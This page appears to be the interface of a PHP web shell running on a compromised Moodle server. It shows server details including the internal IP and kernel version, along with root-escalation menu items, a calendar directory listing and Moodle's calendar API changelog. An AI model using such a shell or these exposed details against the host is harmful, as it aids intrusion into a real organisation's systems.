Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
sipdm.cesa.co.za /
calendar /
Delete
Unzip
Name
Size
Permission
Date
Action
classes
[ DIR ]
drwxr-sr-x
2017-06-22 16:06
tests
[ DIR ]
drwxr-sr-x
2017-06-22 16:06
type
[ DIR ]
drwxr-sr-x
2017-06-22 15:50
yui
[ DIR ]
drwxr-sr-x
2017-06-22 15:50
delete.php
4.56
KB
-rw-r--r--
2017-06-22 16:06
event.php
7.67
KB
-rw-r--r--
2017-06-22 16:06
event_form.php
8.07
KB
-rw-r--r--
2017-06-22 16:06
export.php
7.42
KB
-rw-r--r--
2017-06-22 16:06
export_execute.php
11.14
KB
-rw-r--r--
2017-06-22 16:06
externallib.php
20.13
KB
-rw-r--r--
2017-06-22 16:06
index.php
116
B
-rw-r--r--
2017-06-22 16:06
lib.php
130.69
KB
-rw-r--r--
2017-06-22 16:06
managesubscriptions.php
4.77
KB
-rw-r--r--
2017-06-22 16:06
managesubscriptions_form.php
6.45
KB
-rw-r--r--
2017-06-22 16:06
renderer.php
30.75
KB
-rw-r--r--
2017-06-22 16:06
set.php
4.04
KB
-rw-r--r--
2017-06-22 16:06
upgrade.txt
1.14
KB
-rw-r--r--
2017-06-22 16:06
view.php
7.62
KB
-rw-r--r--
2017-06-22 16:06
Save
Rename
This files describes API changes in /calendar/* , information provided here is intended especially for developers. === 3.2 === * calendar_preferences_button() is now depreciated. Calendar preferences have been moved to the user preferences page. === 2.9 === default values changes in code: * core_calendar_external::get_calendar_events_parameters() 'timeend' default option changed; now, by default, all events are returned, not only the past ones. * calendar types need to be updated to be compatible with standard PHP date/time code === 2.5 === required changes in code: * calendar_add_icalendar_event() now requires a valid subscriptionid * calendar_process_subscription_row() throws exception for invalid subscriptionid * calendar_update_subscription_events() now throws a dml_exception instead of moodle_exception for bad subscriptions * calendar_get_mini() function now has optional $placement and $courseid paramaters. optional - no changes needed: * calendar_update_subscription() should now be used to update Ical subscriptions. === 2.4 === required changes in code: * calendar_get_popup() function now just returns id, instead of the string "id=$id"